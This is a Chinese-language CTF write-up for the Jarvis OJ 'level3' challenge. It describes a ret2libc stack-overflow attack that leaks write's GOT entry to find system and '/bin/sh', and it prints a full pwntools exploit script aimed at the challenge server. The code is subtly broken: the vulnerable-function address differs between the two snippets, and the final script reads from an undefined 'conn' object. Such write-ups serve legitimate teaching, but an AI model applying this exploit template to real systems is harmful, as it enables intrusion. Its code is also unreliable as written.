Jarvis OJ level3 writeup

这题是典型的ROP返回libc地址题,是一个十分经典的ROP题目。

拿到题目我们可以看到他给出了一个rar文件,我们拿这个文件到Linux中解压一下:
Jarvis OJ level3 writeup_第1张图片
解压出两个文件:level3和libc-2.19.so。
我们查看一下这两个文件的保护:
Jarvis OJ level3 writeup_第2张图片
可以看到,libc-2.19.so保护全部开启了(幸好不是攻击他,哈哈),而level3只开了NX保护。
我们把level3放到IDA中查看一下程序逻辑:
Jarvis OJ level3 writeup_第3张图片
我们可以看到vul()函数中含有write函数,但很可惜不能写入shell code再返回来执行,因为程序开启
了堆栈不可执行的保护。但是,write函数是libc函数,他在got表中和system函数的相对位置是不变的。
所以我们可以泄露write函数的真实地址,用来计算system函数的真实地址。

vulfun_addr=0x0804044B #这个可以从IDA中直接查出来
write_plt=e.symbols['write']
write_got=e.got['write']
payload='a'*0x88+'a'*4+p32(write_plt)+p32(vulfun_addr)+p32(1)+p32(write_got)+p32(4) #这里属于延迟绑定机制。

之后把payload输入进去,再接收一下write的真实地址就可以了。
下面是完整的exp:

#! /usr/bin/env python
from pwn import *
p=remote('pwn2.jarvisoj.com',9879)
libc=ELF('./libc-2.19.so')
e=ELF('./level3')
pad=0x88
vulfun_addr=0x0804844B
write_plt=e.symbols['write']
write_got=e.got['write']
payload1='A'*pad+"BBBB"+p32(write_plt)+p32(vulfun_addr)+p32(1)+p32(write_got)+p32(4)
p.recvuntil("Input:\n")
p.sendline(payload1)
write_addr=u32(conn.recv(4))
libc_write=libc.symbols['write']
libc_system=libc.symbols['system']
libc_sh=libc.search('/bin/sh').next()
system_addr=write_addr-libc_write+libc_system
sh_addr=write_addr-libc_write+libc_sh
payload2='A'*pad+"BBBB"+p32(system_addr)+'a'*4+p32(sh_addr)
p.sendline(payload2)
p.interactive()

下面是运行结果:
Jarvis OJ level3 writeup_第4张图片

你可能感兴趣的:(pwn,栈溢出,ROP)